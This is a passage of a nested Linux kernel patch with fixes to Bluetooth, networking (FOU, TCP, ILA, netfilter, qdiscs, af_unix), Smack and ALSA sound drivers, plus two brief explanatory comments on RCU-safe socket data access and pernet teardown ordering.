+-	ev.irk.addr.type = link_to_bdaddr(irk->link_type, irk->addr_type);
++	ev.irk.addr.type = link_to_bdaddr(LE_LINK, irk->addr_type);
+ 	memcpy(ev.irk.val, irk->val, sizeof(irk->val));
+ 
+ 	mgmt_event(MGMT_EV_NEW_IRK, hdev, &ev, sizeof(ev), NULL);
+@@ -9654,7 +9644,7 @@ void mgmt_new_csrk(struct hci_dev *hdev, struct smp_csrk *csrk,
+ 		ev.store_hint = persistent;
+ 
+ 	bacpy(&ev.key.addr.bdaddr, &csrk->bdaddr);
+-	ev.key.addr.type = link_to_bdaddr(csrk->link_type, csrk->bdaddr_type);
++	ev.key.addr.type = link_to_bdaddr(LE_LINK, csrk->bdaddr_type);
+ 	ev.key.type = csrk->type;
+ 	memcpy(ev.key.val, csrk->val, sizeof(csrk->val));
+ 
+diff --git a/net/bluetooth/smp.c b/net/bluetooth/smp.c
+index d444fa1bd9f97..b93494790877f 100644
+--- a/net/bluetooth/smp.c
++++ b/net/bluetooth/smp.c
+@@ -1059,7 +1059,6 @@ static void smp_notify_keys(struct l2cap_conn *conn)
+ 	}
+ 
+ 	if (smp->remote_irk) {
+-		smp->remote_irk->link_type = hcon->type;
+ 		mgmt_new_irk(hdev, smp->remote_irk, persistent);
+ 
+ 		/* Now that user space can be considered to know the
+@@ -1074,28 +1073,24 @@ static void smp_notify_keys(struct l2cap_conn *conn)
+ 	}
+ 
+ 	if (smp->csrk) {
+-		smp->csrk->link_type = hcon->type;
+ 		smp->csrk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->csrk->bdaddr, &hcon->dst);
+ 		mgmt_new_csrk(hdev, smp->csrk, persistent);
+ 	}
+ 
+ 	if (smp->responder_csrk) {
+-		smp->responder_csrk->link_type = hcon->type;
+ 		smp->responder_csrk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->responder_csrk->bdaddr, &hcon->dst);
+ 		mgmt_new_csrk(hdev, smp->responder_csrk, persistent);
+ 	}
+ 
+ 	if (smp->ltk) {
+-		smp->ltk->link_type = hcon->type;
+ 		smp->ltk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->ltk->bdaddr, &hcon->dst);
+ 		mgmt_new_ltk(hdev, smp->ltk, persistent);
+ 	}
+ 
+ 	if (smp->responder_ltk) {
+-		smp->responder_ltk->link_type = hcon->type;
+ 		smp->responder_ltk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->responder_ltk->bdaddr, &hcon->dst);
+ 		mgmt_new_ltk(hdev, smp->responder_ltk, persistent);
+@@ -1115,8 +1110,6 @@ static void smp_notify_keys(struct l2cap_conn *conn)
+ 		key = hci_add_link_key(hdev, smp->conn->hcon, &hcon->dst,
+ 				       smp->link_key, type, 0, &persistent);
+ 		if (key) {
+-			key->link_type = hcon->type;
+-			key->bdaddr_type = hcon->dst_type;
+ 			mgmt_new_link_key(hdev, key, persistent);
+ 
+ 			/* Don't keep debug keys around if the relevant
+diff --git a/net/bridge/br_fdb.c b/net/bridge/br_fdb.c
+index e7f4fccb6adb4..882b6a67e11f8 100644
+--- a/net/bridge/br_fdb.c
++++ b/net/bridge/br_fdb.c
+@@ -1388,12 +1388,10 @@ int br_fdb_external_learn_add(struct net_bridge *br, struct net_bridge_port *p,
+ 			modified = true;
+ 		}
+ 
+-		if (test_bit(BR_FDB_ADDED_BY_EXT_LEARN, &fdb->flags)) {
++		if (test_and_set_bit(BR_FDB_ADDED_BY_EXT_LEARN, &fdb->flags)) {
+ 			/* Refresh entry */
+ 			fdb->used = jiffies;
+-		} else if (!test_bit(BR_FDB_ADDED_BY_USER, &fdb->flags)) {
+-			/* Take over SW learned entry */
+-			set_bit(BR_FDB_ADDED_BY_EXT_LEARN, &fdb->flags);
++		} else {
+ 			modified = true;
+ 		}
+ 
+diff --git a/net/can/bcm.c b/net/can/bcm.c
+index 925d48cc50f81..4ecb5cd8a22d0 100644
+--- a/net/can/bcm.c
++++ b/net/can/bcm.c
+@@ -1428,6 +1428,10 @@ static void bcm_notify(struct bcm_sock *bo, unsigned long msg,
+ 
+ 		/* remove device reference, if this is our bound device */
+ 		if (bo->bound && bo->ifindex == dev->ifindex) {
++#if IS_ENABLED(CONFIG_PROC_FS)
++			if (sock_net(sk)->can.bcmproc_dir && bo->bcm_proc_read)
++				remove_proc_entry(bo->procname, sock_net(sk)->can.bcmproc_dir);
++#endif
+ 			bo->bound   = 0;
+ 			bo->ifindex = 0;
+ 			notify_enodev = 1;
+diff --git a/net/ipv4/fou.c b/net/ipv4/fou.c
+index 358bff068eef8..7bcc933103e2d 100644
+--- a/net/ipv4/fou.c
++++ b/net/ipv4/fou.c
+@@ -48,7 +48,7 @@ struct fou_net {
+ 
+ static inline struct fou *fou_from_sock(struct sock *sk)
+ {
+-	return sk->sk_user_data;
++	return rcu_dereference_sk_user_data(sk);
+ }
+ 
+ static int fou_recv_pull(struct sk_buff *skb, struct fou *fou, size_t len)
+@@ -231,9 +231,15 @@ static struct sk_buff *fou_gro_receive(struct sock *sk,
+ 				       struct sk_buff *skb)
+ {
+ 	const struct net_offload __rcu **offloads;
+-	u8 proto = fou_from_sock(sk)->protocol;
++	struct fou *fou = fou_from_sock(sk);
+ 	const struct net_offload *ops;
+ 	struct sk_buff *pp = NULL;
++	u8 proto;
++
++	if (!fou)
++		goto out;
++
++	proto = fou->protocol;
+ 
+ 	/* We can clear the encap_mark for FOU as we are essentially doing
+ 	 * one of two possible things.  We are either adding an L4 tunnel
+@@ -261,14 +267,24 @@ static int fou_gro_complete(struct sock *sk, struct sk_buff *skb,
+ 			    int nhoff)
+ {
+ 	const struct net_offload __rcu **offloads;
+-	u8 proto = fou_from_sock(sk)->protocol;
++	struct fou *fou = fou_from_sock(sk);
+ 	const struct net_offload *ops;
+-	int err = -ENOSYS;
++	u8 proto;
++	int err;
++
++	if (!fou) {
++		err = -ENOENT;
++		goto out;
++	}
++
++	proto = fou->protocol;
+ 
+ 	offloads = NAPI_GRO_CB(skb)->is_ipv6 ? inet6_offloads : inet_offloads;
+ 	ops = rcu_dereference(offloads[proto]);
+-	if (WARN_ON(!ops || !ops->callbacks.gro_complete))
++	if (WARN_ON(!ops || !ops->callbacks.gro_complete)) {
++		err = -ENOSYS;
+ 		goto out;
++	}
+ 
+ 	err = ops->callbacks.gro_complete(skb, nhoff);
+ 
+@@ -318,6 +334,9 @@ static struct sk_buff *gue_gro_receive(struct sock *sk,
+ 	struct gro_remcsum grc;
+ 	u8 proto;
+ 
++	if (!fou)
++		goto out;
++
+ 	skb_gro_remcsum_init(&grc);
+ 
+ 	off = skb_gro_offset(skb);
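
All three FOU/GUE GRO paths now re-check the socket's user data, since it
can be cleared while callbacks are still in flight. The defensive read looks
like this (a sketch; struct my_state is a hypothetical type):

    #include <net/sock.h>

    static struct my_state *state_from_sock(struct sock *sk)
    {
        /* RCU-safe; may legitimately return NULL during teardown. */
        return rcu_dereference_sk_user_data(sk);
    }

    /* in a callback: */
    struct my_state *st = state_from_sock(sk);

    if (!st)
        return -ENOENT;     /* socket is being unhooked; bail out */
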
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index f8037d142bb75..07a896685d0d3 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -572,7 +572,7 @@ static int tcp_bpf_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 		err = sk_stream_error(sk, msg->msg_flags, err);
+ 	release_sock(sk);
+ 	sk_psock_put(sk, psock);
+-	return copied ? copied : err;
++	return copied > 0 ? copied : err;
+ }
+ 
+ static int tcp_bpf_sendpage(struct sock *sk, struct page *page, int offset,
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index b1b4f44d21370..4c7a2702d904d 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -5843,6 +5843,11 @@ static bool tcp_validate_incoming(struct sock *sk, struct sk_buff *skb,
+ 	 * RFC 5961 4.2 : Send a challenge ack
+ 	 */
+ 	if (th->syn) {
++		if (sk->sk_state == TCP_SYN_RECV && sk->sk_socket && th->ack &&
++		    TCP_SKB_CB(skb)->seq + 1 == TCP_SKB_CB(skb)->end_seq &&
++		    TCP_SKB_CB(skb)->seq + 1 == tp->rcv_nxt &&
++		    TCP_SKB_CB(skb)->ack_seq == tp->snd_nxt)
++			goto pass;
+ syn_challenge:
+ 		if (syn_inerr)
+ 			TCP_INC_STATS(sock_net(sk), TCP_MIB_INERRS);
+@@ -5852,6 +5857,7 @@ static bool tcp_validate_incoming(struct sock *sk, struct sk_buff *skb,
+ 		goto discard;
+ 	}
+ 
++pass:
+ 	bpf_skops_parse_hdr(sk, skb);
+ 
+ 	return true;
+diff --git a/net/ipv6/ila/ila.h b/net/ipv6/ila/ila.h
+index ad5f6f6ba3330..85b92917849bf 100644
+--- a/net/ipv6/ila/ila.h
++++ b/net/ipv6/ila/ila.h
+@@ -108,6 +108,7 @@ int ila_lwt_init(void);
+ void ila_lwt_fini(void);
+ 
+ int ila_xlat_init_net(struct net *net);
++void ila_xlat_pre_exit_net(struct net *net);
+ void ila_xlat_exit_net(struct net *net);
+ 
+ int ila_xlat_nl_cmd_add_mapping(struct sk_buff *skb, struct genl_info *info);
+diff --git a/net/ipv6/ila/ila_main.c b/net/ipv6/ila/ila_main.c
+index 3faf62530d6a4..cba81158a24e1 100644
+--- a/net/ipv6/ila/ila_main.c
++++ b/net/ipv6/ila/ila_main.c
+@@ -72,6 +72,11 @@ static __net_init int ila_init_net(struct net *net)
+ 	return err;
+ }
+ 
++static __net_exit void ila_pre_exit_net(struct net *net)
++{
++	ila_xlat_pre_exit_net(net);
++}
++
+ static __net_exit void ila_exit_net(struct net *net)
+ {
+ 	ila_xlat_exit_net(net);
+@@ -79,6 +84,7 @@ static __net_exit void ila_exit_net(struct net *net)
+ 
+ static struct pernet_operations ila_net_ops = {
+ 	.init = ila_init_net,
++	.pre_exit = ila_pre_exit_net,
+ 	.exit = ila_exit_net,
+ 	.id   = &ila_net_id,
+ 	.size = sizeof(struct ila_net),
+diff --git a/net/ipv6/ila/ila_xlat.c b/net/ipv6/ila/ila_xlat.c
+index bee45dfeb1874..2e7a36a1ea0a8 100644
+--- a/net/ipv6/ila/ila_xlat.c
++++ b/net/ipv6/ila/ila_xlat.c
+@@ -620,6 +620,15 @@ int ila_xlat_init_net(struct net *net)
+ 	return 0;
+ }
+ 
++void ila_xlat_pre_exit_net(struct net *net)
++{
++	struct ila_net *ilan = net_generic(net, ila_net_id);
++
++	if (ilan->xlat.hooks_registered)
++		nf_unregister_net_hooks(net, ila_nf_hook_ops,
++					ARRAY_SIZE(ila_nf_hook_ops));
++}
++
+ void ila_xlat_exit_net(struct net *net)
+ {
+ 	struct ila_net *ilan = net_generic(net, ila_net_id);
+@@ -627,10 +636,6 @@ void ila_xlat_exit_net(struct net *net)
+ 	rhashtable_free_and_destroy(&ilan->xlat.rhash_table, ila_free_cb, NULL);
+ 
+ 	free_bucket_spinlocks(ilan->xlat.locks);
+-
+-	if (ilan->xlat.hooks_registered)
+-		nf_unregister_net_hooks(net, ila_nf_hook_ops,
+-					ARRAY_SIZE(ila_nf_hook_ops));
+ }
+ 
+ static int ila_xlat_addr(struct sk_buff *skb, bool sir2ila)
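
The ILA split relies on pernet teardown ordering: all .pre_exit callbacks
run, and an RCU grace period elapses, before .exit is called, so the
netfilter hooks are guaranteed gone before the tables they walk are freed.
Registration then looks like this (a sketch; the callbacks are hypothetical):

    static struct pernet_operations my_net_ops = {
        .init     = my_init_net,        /* allocate per-net state */
        .pre_exit = my_pre_exit_net,    /* unregister hooks here */
        .exit     = my_exit_net,        /* free per-net state here */
        .id       = &my_net_id,
        .size     = sizeof(struct my_net),
    };
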
+diff --git a/net/netfilter/nf_conncount.c b/net/netfilter/nf_conncount.c
+index 5d8ed6c90b7ef..5885810da412f 100644
+--- a/net/netfilter/nf_conncount.c
++++ b/net/netfilter/nf_conncount.c
+@@ -321,7 +321,6 @@ insert_tree(struct net *net,
+ 	struct nf_conncount_rb *rbconn;
+ 	struct nf_conncount_tuple *conn;
+ 	unsigned int count = 0, gc_count = 0;
+-	u8 keylen = data->keylen;
+ 	bool do_gc = true;
+ 
+ 	spin_lock_bh(&nf_conncount_locks[hash]);
+@@ -333,7 +332,7 @@ insert_tree(struct net *net,
+ 		rbconn = rb_entry(*rbnode, struct nf_conncount_rb, node);
+ 
+ 		parent = *rbnode;
+-		diff = key_diff(key, rbconn->key, keylen);
++		diff = key_diff(key, rbconn->key, data->keylen);
+ 		if (diff < 0) {
+ 			rbnode = &((*rbnode)->rb_left);
+ 		} else if (diff > 0) {
+@@ -378,7 +377,7 @@ insert_tree(struct net *net,
+ 
+ 	conn->tuple = *tuple;
+ 	conn->zone = *zone;
+-	memcpy(rbconn->key, key, sizeof(u32) * keylen);
++	memcpy(rbconn->key, key, sizeof(u32) * data->keylen);
+ 
+ 	nf_conncount_list_init(&rbconn->list);
+ 	list_add(&conn->node, &rbconn->list.head);
+@@ -403,7 +402,6 @@ count_tree(struct net *net,
+ 	struct rb_node *parent;
+ 	struct nf_conncount_rb *rbconn;
+ 	unsigned int hash;
+-	u8 keylen = data->keylen;
+ 
+ 	hash = jhash2(key, data->keylen, conncount_rnd) % CONNCOUNT_SLOTS;
+ 	root = &data->root[hash];
+@@ -414,7 +412,7 @@ count_tree(struct net *net,
+ 
+ 		rbconn = rb_entry(parent, struct nf_conncount_rb, node);
+ 
+-		diff = key_diff(key, rbconn->key, keylen);
++		diff = key_diff(key, rbconn->key, data->keylen);
+ 		if (diff < 0) {
+ 			parent = rcu_dereference_raw(parent->rb_left);
+ 		} else if (diff > 0) {
+diff --git a/net/sched/sch_cake.c b/net/sched/sch_cake.c
+index 3ed0c33421893..73e8caeffd47e 100644
+--- a/net/sched/sch_cake.c
++++ b/net/sched/sch_cake.c
+@@ -785,12 +785,15 @@ static u32 cake_hash(struct cake_tin_data *q, const struct sk_buff *skb,
+ 		 * queue, accept the collision, update the host tags.
+ 		 */
+ 		q->way_collisions++;
+-		if (q->flows[outer_hash + k].set == CAKE_SET_BULK) {
+-			q->hosts[q->flows[reduced_hash].srchost].srchost_bulk_flow_count--;
+-			q->hosts[q->flows[reduced_hash].dsthost].dsthost_bulk_flow_count--;
+-		}
+ 		allocate_src = cake_dsrc(flow_mode);
+ 		allocate_dst = cake_ddst(flow_mode);
++
++		if (q->flows[outer_hash + k].set == CAKE_SET_BULK) {
++			if (allocate_src)
++				q->hosts[q->flows[reduced_hash].srchost].srchost_bulk_flow_count--;
++			if (allocate_dst)
++				q->hosts[q->flows[reduced_hash].dsthost].dsthost_bulk_flow_count--;
++		}
+ found:
+ 		/* reserve queue for future packets in same flow */
+ 		reduced_hash = outer_hash + k;
+diff --git a/net/sched/sch_netem.c b/net/sched/sch_netem.c
+index a18b24c125f4e..0eba06613dcde 100644
+--- a/net/sched/sch_netem.c
++++ b/net/sched/sch_netem.c
+@@ -733,11 +733,10 @@ static struct sk_buff *netem_dequeue(struct Qdisc *sch)
+ 
+ 				err = qdisc_enqueue(skb, q->qdisc, &to_free);
+ 				kfree_skb_list(to_free);
+-				if (err != NET_XMIT_SUCCESS &&
+-				    net_xmit_drop_count(err)) {
+-					qdisc_qstats_drop(sch);
+-					qdisc_tree_reduce_backlog(sch, 1,
+-								  pkt_len);
++				if (err != NET_XMIT_SUCCESS) {
++					if (net_xmit_drop_count(err))
++						qdisc_qstats_drop(sch);
++					qdisc_tree_reduce_backlog(sch, 1, pkt_len);
+ 				}
+ 				goto tfifo_dequeue;
+ 			}
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 7d59f9a6c9046..5ce60087086c2 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -680,9 +680,6 @@ static void init_peercred(struct sock *sk)
+ 
+ static void copy_peercred(struct sock *sk, struct sock *peersk)
+ {
+-	const struct cred *old_cred;
+-	struct pid *old_pid;
+-
+ 	if (sk < peersk) {
+ 		spin_lock(&sk->sk_peer_lock);
+ 		spin_lock_nested(&peersk->sk_peer_lock, SINGLE_DEPTH_NESTING);
+@@ -690,16 +687,12 @@ static void copy_peercred(struct sock *sk, struct sock *peersk)
+ 		spin_lock(&peersk->sk_peer_lock);
+ 		spin_lock_nested(&sk->sk_peer_lock, SINGLE_DEPTH_NESTING);
+ 	}
+-	old_pid = sk->sk_peer_pid;
+-	old_cred = sk->sk_peer_cred;
++
+ 	sk->sk_peer_pid  = get_pid(peersk->sk_peer_pid);
+ 	sk->sk_peer_cred = get_cred(peersk->sk_peer_cred);
+ 
+ 	spin_unlock(&sk->sk_peer_lock);
+ 	spin_unlock(&peersk->sk_peer_lock);
+-
+-	put_pid(old_pid);
+-	put_cred(old_cred);
+ }
+ 
+ static int unix_listen(struct socket *sock, int backlog)
+diff --git a/rust/Makefile b/rust/Makefile
+index 6d0c0e9757f21..28ba3b9ee18dd 100644
+--- a/rust/Makefile
++++ b/rust/Makefile
+@@ -303,9 +303,7 @@ $(obj)/bindings/bindings_helpers_generated.rs: $(src)/helpers.c FORCE
+ quiet_cmd_exports = EXPORTS $@
+       cmd_exports = \
+ 	$(NM) -p --defined-only $< \
+-		| grep -E ' (T|R|D) ' | cut -d ' ' -f 3 \
+-		| xargs -Isymbol \
+-		echo 'EXPORT_SYMBOL_RUST_GPL(symbol);' > $@
++		| awk '/ (T|R|D|B) / {printf "EXPORT_SYMBOL_RUST_GPL(%s);\n",$$3}' > $@
+ 
+ $(obj)/exports_core_generated.h: $(obj)/core.o FORCE
+ 	$(call if_changed,exports)
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index 75b3e91d5a5f8..c18366dbbfed1 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -3706,12 +3706,18 @@ static int smack_unix_stream_connect(struct sock *sock,
+ 		}
+ 	}
+ 
+-	/*
+-	 * Cross reference the peer labels for SO_PEERSEC.
+-	 */
+ 	if (rc == 0) {
++		/*
++		 * Cross reference the peer labels for SO_PEERSEC.
++		 */
+ 		nsp->smk_packet = ssp->smk_out;
+ 		ssp->smk_packet = osp->smk_out;
++
++		/*
++		 * The new (child) socket must inherit the listening
++		 * socket's labels.
++		 */
++		nsp->smk_out = osp->smk_out;
++		nsp->smk_in  = osp->smk_in;
+ 	}
+ 
+ 	return rc;
+diff --git a/sound/core/control.c b/sound/core/control.c
+index 82aa1af1d1d87..92266c97238da 100644
+--- a/sound/core/control.c
++++ b/sound/core/control.c
+@@ -1477,12 +1477,16 @@ static int snd_ctl_elem_user_get(struct snd_kcontrol *kcontrol,
+ static int snd_ctl_elem_user_put(struct snd_kcontrol *kcontrol,
+ 				 struct snd_ctl_elem_value *ucontrol)
+ {
+-	int change;
++	int err, change;
+ 	struct user_element *ue = kcontrol->private_data;
+ 	unsigned int size = ue->elem_data_size;
+ 	char *dst = ue->elem_data +
+ 			snd_ctl_get_ioff(kcontrol, &ucontrol->id) * size;
+ 
++	err = sanity_check_input_values(ue->card, ucontrol, &ue->info, false);
++	if (err < 0)
++		return err;
++
+ 	change = memcmp(&ucontrol->value, dst, size) != 0;
+ 	if (change)
+ 		memcpy(dst, &ucontrol->value, size);
+diff --git a/sound/hda/hdmi_chmap.c b/sound/hda/hdmi_chmap.c
+index 5d8e1d944b0af..7b276047f85a7 100644
+--- a/sound/hda/hdmi_chmap.c
++++ b/sound/hda/hdmi_chmap.c
+@@ -753,6 +753,20 @@ static int hdmi_chmap_ctl_get(struct snd_kcontrol *kcontrol,
+ 	return 0;
+ }
+ 
++/* a simple sanity check for input values to chmap kcontrol */
++static int chmap_value_check(struct hdac_chmap *hchmap,
++			     const struct snd_ctl_elem_value *ucontrol)
++{
++	int i;
++
++	for (i = 0; i < hchmap->channels_max; i++) {
++		if (ucontrol->value.integer.value[i] < 0 ||
++		    ucontrol->value.integer.value[i] > SNDRV_CHMAP_LAST)
++			return -EINVAL;
++	}
++	return 0;
++}
++
+ static int hdmi_chmap_ctl_put(struct snd_kcontrol *kcontrol,
+ 			      struct snd_ctl_elem_value *ucontrol)
+ {
+@@ -764,6 +778,10 @@ static int hdmi_chmap_ctl_put(struct snd_kcontrol *kcontrol,
+ 	unsigned char chmap[8], per_pin_chmap[8];
+ 	int i, err, ca, prepared = 0;
+ 
++	err = chmap_value_check(hchmap, ucontrol);
++	if (err < 0)
++		return err;
++
+ 	/* No monitor is connected in dyn_pcm_assign.
+ 	 * It's invalid to setup the chmap
+ 	 */
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index 8396d1d93668c..63bd0e384bae2 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -311,6 +311,7 @@ enum {
+ 	CXT_FIXUP_HEADSET_MIC,
+ 	CXT_FIXUP_HP_MIC_NO_PRESENCE,
+ 	CXT_PINCFG_SWS_JS201D,
++	CXT_PINCFG_TOP_SPEAKER,
+ };
+ 
+ /* for hda_fixup_thinkpad_acpi() */
+@@ -978,6 +979,13 @@ static const struct hda_fixup cxt_fixups[] = {
+ 		.type = HDA_FIXUP_PINS,
+ 		.v.pins = cxt_pincfg_sws_js201d,
+ 	},
++	[CXT_PINCFG_TOP_SPEAKER] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x1d, 0x82170111 },
++			{ }
++		},
++	},
+ };
+ 
+ static const struct snd_pci_quirk cxt5045_fixups[] = {
+@@ -1074,6 +1082,8 @@ static const struct snd_pci_quirk cxt5066_fixups[] = {
+ 	SND_PCI_QUIRK_VENDOR(0x17aa, "Thinkpad", CXT_FIXUP_THINKPAD_ACPI),
+ 	SND_PCI_QUIRK(0x1c06, 0x2011, "Lemote A1004", CXT_PINCFG_LEMOTE_A1004),
+ 	SND_PCI_QUIRK(0x1c06, 0x2012, "Lemote A1205", CXT_PINCFG_LEMOTE_A1205),
++	SND_PCI_QUIRK(0x2782, 0x12c3, "Sirius Gen1", CXT_PINCFG_TOP_SPEAKER),
++	SND_PCI_QUIRK(0x2782, 0x12c5, "Sirius Gen2", CXT_PINCFG_TOP_SPEAKER),
+ 	{}
+ };
+ 
+@@ -1093,6 +1103,7 @@ static const struct hda_model_fixup cxt5066_fixup_models[] = {
+ 	{ .id = CXT_FIXUP_HP_MIC_NO_PRESENCE, .name = "hp-mic-fix" },
+ 	{ .id = CXT_PINCFG_LENOVO_NOTEBOOK, .name = "lenovo-20149" },
+ 	{ .id = CXT_PINCFG_SWS_JS201D, .name = "sws-js201d" },
++	{ .id = CXT_PINCFG_TOP_SPEAKER, .name = "sirius-top-speaker" },
+ 	{}
+ };
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index b942ed868070d..d869d6ba96f3d 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -7289,6 +7289,7 @@ enum {
+ 	ALC236_FIXUP_HP_GPIO_LED,
+ 	ALC236_FIXUP_HP_MUTE_LED,
+ 	ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF,
++	ALC236_FIXUP_LENOVO_INV_DMIC,
+ 	ALC298_FIXUP_SAMSUNG_AMP,
+ 	ALC298_FIXUP_SAMSUNG_HEADPHONE_VERY_QUIET,
+ 	ALC256_FIXUP_SAMSUNG_HEADPHONE_VERY_QUIET,
+@@ -8805,6 +8806,12 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc236_fixup_hp_mute_led_micmute_vref,
+ 	},
++	[ALC236_FIXUP_LENOVO_INV_DMIC] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc_fixup_inv_dmic,
++		.chained = true,
++		.chain_id = ALC283_FIXUP_INT_MIC,
++	},
+ 	[ALC298_FIXUP_SAMSUNG_AMP] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc298_fixup_samsung_amp,
+@@ -9710,6 +9717,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x87f5, "HP", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87f6, "HP Spectre x360 14", ALC245_FIXUP_HP_X360_AMP),
+ 	SND_PCI_QUIRK(0x103c, 0x87f7, "HP Spectre x360 14", ALC245_FIXUP_HP_X360_AMP),
++	SND_PCI_QUIRK(0x103c, 0x87fd, "HP Laptop 14-dq2xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x87fe, "HP Laptop 15s-fq2xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8805, "HP ProBook 650 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x880d, "HP EliteBook 830 G8 Notebook PC", ALC285_FIXUP_HP_GPIO_LED),
+@@ -10111,6 +10119,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x3866, "Lenovo 13X", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x3869, "Lenovo Yoga7 14IAL7", ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x3902, "Lenovo E50-80", ALC269_FIXUP_DMIC_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x3913, "Lenovo 145", ALC236_FIXUP_LENOVO_INV_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3977, "IdeaPad S210", ALC283_FIXUP_INT_MIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3978, "Lenovo B50-70", ALC269_FIXUP_DMIC_THINKPAD_ACPI),
+ 	SND_PCI_QUIRK(0x17aa, 0x3bf8, "Quanta FL1", ALC269_FIXUP_PCM_44K),
+@@ -10359,6 +10368,7 @@ static const struct hda_model_fixup alc269_fixup_models[] = {
+ 	{.id = ALC623_FIXUP_LENOVO_THINKSTATION_P340, .name = "alc623-lenovo-thinkstation-p340"},
+ 	{.id = ALC255_FIXUP_ACER_HEADPHONE_AND_MIC, .name = "alc255-acer-headphone-and-mic"},
+ 	{.id = ALC285_FIXUP_HP_GPIO_AMP_INIT, .name = "alc285-hp-amp-init"},
++	{.id = ALC236_FIXUP_LENOVO_INV_DMIC, .name = "alc236-fixup-lenovo-inv-mic"},
+ 	{}
+ };
+ #define ALC225_STANDARD_PINS \
+diff --git a/sound/soc/soc-dapm.c b/sound/soc/soc-dapm.c
+index 6eb8c6cb5e673..4103443770b03 100644
+--- a/sound/soc/soc-dapm.c
++++ b/sound/soc/soc-dapm.c
+@@ -4018,6 +4018,7 @@ static int snd_soc_dai_link_event(struct snd_soc_dapm_widget *w,
+ 
+ 	case SND_SOC_DAPM_POST_PMD:
+ 		kfree(substream->runtime);
++		substream->runtime = NULL;
+ 		break;
+ 
+ 	default:
+diff --git a/sound/soc/soc-topology.c b/sound/soc/soc-topology.c
+index fcb8a36d4a06c..77296c9503767 100644
+--- a/sound/soc/soc-topology.c
++++ b/sound/soc/soc-topology.c
+@@ -889,6 +889,8 @@ static int soc_tplg_denum_create_values(struct soc_tplg *tplg, struct soc_enum *
+ 		se->dobj.control.dvalues[i] = le32_to_cpu(ec->values[i]);
+ 	}
+ 
++	se->items = le32_to_cpu(ec->items);
++	se->values = (const unsigned int *)se->dobj.control.dvalues;
+ 	return 0;
+ }
+ 
+diff --git a/sound/soc/sof/topology.c b/sound/soc/sof/topology.c
+index e7305ce57ea1f..374c8b1d69584 100644
+--- a/sound/soc/sof/topology.c
++++ b/sound/soc/sof/topology.c
+@@ -1817,6 +1817,8 @@ static int sof_link_unload(struct snd_soc_component *scomp, struct snd_soc_dobj
+ 	if (!slink)
+ 		return 0;
+ 
++	slink->link->platforms->name = NULL;
++
+ 	kfree(slink->tuples);
+ 	list_del(&slink->list);
+ 	kfree(slink->hw_configs);
+diff --git a/sound/soc/sunxi/sun4i-i2s.c b/sound/soc/sunxi/sun4i-i2s.c
+index 6028871825bae..47faaf849de0b 100644
+--- a/sound/soc/sunxi/sun4i-i2s.c
++++ b/sound/soc/sunxi/sun4i-i2s.c
+@@ -100,8 +100,8 @@
+ #define SUN8I_I2S_CTRL_MODE_PCM			(0 << 4)
+ 
+ #define SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK	BIT(19)
+-#define SUN8I_I2S_FMT0_LRCLK_POLARITY_INVERTED		(1 << 19)
+-#define SUN8I_I2S_FMT0_LRCLK_POLARITY_NORMAL		(0 << 19)
++#define SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH	(1 << 19)
++#define SUN8I_I2S_FMT0_LRCLK_POLARITY_START_LOW		(0 << 19)
+ #define SUN8I_I2S_FMT0_LRCK_PERIOD_MASK		GENMASK(17, 8)
+ #define SUN8I_I2S_FMT0_LRCK_PERIOD(period)	((period - 1) << 8)
+ #define SUN8I_I2S_FMT0_BCLK_POLARITY_MASK	BIT(7)
+@@ -727,65 +727,37 @@ static int sun4i_i2s_set_soc_fmt(const struct sun4i_i2s *i2s,
+ static int sun8i_i2s_set_soc_fmt(const struct sun4i_i2s *i2s,
+ 				 unsigned int fmt)
+ {
+-	u32 mode, val;
++	u32 mode, lrclk_pol, bclk_pol, val;
+ 	u8 offset;
+ 
+-	/*
+-	 * DAI clock polarity
+-	 *
+-	 * The setup for LRCK contradicts the datasheet, but under a
